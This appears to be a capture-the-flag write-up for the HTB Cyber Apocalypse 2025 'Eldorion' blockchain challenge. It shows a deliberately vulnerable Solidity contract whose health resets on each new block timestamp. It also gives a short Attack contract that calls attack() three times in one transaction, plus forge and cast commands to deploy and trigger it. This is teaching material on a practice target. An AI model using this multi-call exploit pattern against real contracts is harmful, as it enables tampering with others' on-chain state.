2025-03-25

HTB Cyber Apocalypse CTF 2025 - Eldorion [blockchain]

Difficulty : Easy

Team : Phreaks 2600

Description : “Welcome to the realms of Eldoria, adventurer. You’ve found yourself trapped in this mysterious digital domain, and the only way to escape is by overcoming the trials laid before you. But your journey has barely begun, and already an overwhelming obstacle stands in your path. Before you can even reach the nearest city, seeking allies and information, you must face Eldorion, a colossal beast with terrifying regenerative powers. This creature, known for its ““eternal resilience”” guards the only passage forward. It’s clear: you must defeat Eldorion to continue your quest.”

Author : PerryThePwner

Topics : timestamp, transactions

TL;DR

• write a contract that will trigger attack() multiple time in one function.

• get the flag

Introduction

For this challenge we have one main contract to study. Through this contract, we can carry out attacks to reduce its health to 0.

Recon

Smart Contracts

Here are the smart contracts :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;

import { Eldorion } from "./Eldorion.sol";

contract Setup {
    Eldorion public immutable TARGET;
    
    event DeployedTarget(address at);

    constructor() payable {
        TARGET = new Eldorion();
        emit DeployedTarget(address(TARGET));
    }

    function isSolved() public view returns (bool) {
        return TARGET.isDefeated();
    }
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;

contract Eldorion {
    uint256 public health = 300;
    uint256 public lastAttackTimestamp;
    uint256 private constant MAX_HEALTH = 300;
    
    event EldorionDefeated(address slayer);
    
    modifier eternalResilience() {
        if (block.timestamp > lastAttackTimestamp) {
            health = MAX_HEALTH;
            lastAttackTimestamp = block.timestamp;
        }
        _;
    }
    
    function attack(uint256 damage) external eternalResilience {
        require(damage <= 100, "Mortals cannot strike harder than 100");
        require(health >= damage, "Overkill is wasteful");
        health -= damage;
        
        if (health == 0) {
            emit EldorionDefeated(msg.sender);
        }
    }

    function isDefeated() external view returns (bool) {
        return health == 0;
    }
}

Code Reading

Setup.sol

This contract do nothing extravagant except deploying the target contract (Eldorion) :

1
2
3
4

constructor() payable {
    TARGET = new Eldorion();
    emit DeployedTarget(address(TARGET));
}

And check if we solved the challenge :

1
2
3

function isSolved() public view returns (bool) {
    return TARGET.isDefeated();
}

And it calls isDefeated from the target contract.

Eldorion.sol

We will start directly by reading isDefeated :

1
2
3

function isDefeated() external view returns (bool) {
    return health == 0;
}

It checks if the health is equal to 0.

And coincidence, there’s an attack function above.

1
2
3
4
5
6
7
8
9

function attack(uint256 damage) external eternalResilience {
    require(damage <= 100, "Mortals cannot strike harder than 100");
    require(health >= damage, "Overkill is wasteful");
    health -= damage;
    
    if (health == 0) {
        emit EldorionDefeated(msg.sender);
    }
}

We can submit a quantity of damage to inflict. But there are two conditions :

• One attack can’t inflict damages above 100.
• The damage inflicted can’t be greater than the remaining health.

If satisfied, the health is subtracted by the damage inflicted.

But what I didn’t mentionned, is that a modifier is applied to the function, eternalResilience.

A modifier allow us to, modify the execution of a function :

1
2
3
4
5
6
7

modifier eternalResilience() {
    if (block.timestamp > lastAttackTimestamp) {
        health = MAX_HEALTH;
        lastAttackTimestamp = block.timestamp;
    }
    _;
}

It checks if the current block timestamp is greater than lastAttackTimestamp, if yes, the health is set back to MAX_HEALTH (300), and lastAttackTimestamp set to the current block timestamp.

The underscore _;, states to continue the flow of the function that called this modifier.

So what we can deduce is that each time we attack, the health is put back to the max if the current block timestamp is greater than the last attack timestamp.

And that’s pretty all.

Solving

So to solve, we know we have to put the health to zero.

BUT,

We can’t inflict more than 100 damage, and every attacks, if the block timestamp change, the health return to the max health.

To solve we need to have in mind two concepts which are transactions and blocks.

From the ethereum documentation about transactions :

Transactions are cryptographically signed instructions from accounts. An account will initiate a transaction to update the state of the Ethereum network. The simplest transaction is transferring ETH from one account to another.

A transaction can also be a call to a function, like attack().

And for the blocks :

Blocks are batches of transactions with a hash of the previous block in the chain.

Also each block have other properties :

• block number
• block timestamp
• block hash
• …

In shorts a block can contains multiple transaction in it that will share the same block properties, thus we can manage to have multiple call of attack() in one block so the timestamp stay the same.

To do that, we can write a contract with a function that will call three times attack() with a value of 100 :

Attack.sol

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;

import {Eldorion} from "./Eldorion.sol";

contract Attack {

    Eldorion public TARGET;

    constructor(address _target) {

        TARGET = Eldorion(_target);
    }

    function attack() public {

        TARGET.attack(100);
        TARGET.attack(100);
        TARGET.attack(100);
    }
}

We can deploy the contract with forge from foundry-rs :

1

forge create -r $RPC --broadcast Attack.sol:Attack --private-key $PKEY --root . --constructor-args $TARGET

And trigger the attack :

1

cast send -r $RPC 0x12472c70fF0a3cA2f26AB14E3820778C9601b232 --private-key $PKEY "attack()"

HTB{w0w_tr1pl3_hit_c0mbo_ggs_y0u_d...}.

References

• https://ethereum.org/en/developers/docs/transactions/
• https://docs.soliditylang.org/en/latest/cheatsheet.html#block-and-transaction-properties
• https://ethereum.org/en/developers/docs/blocks/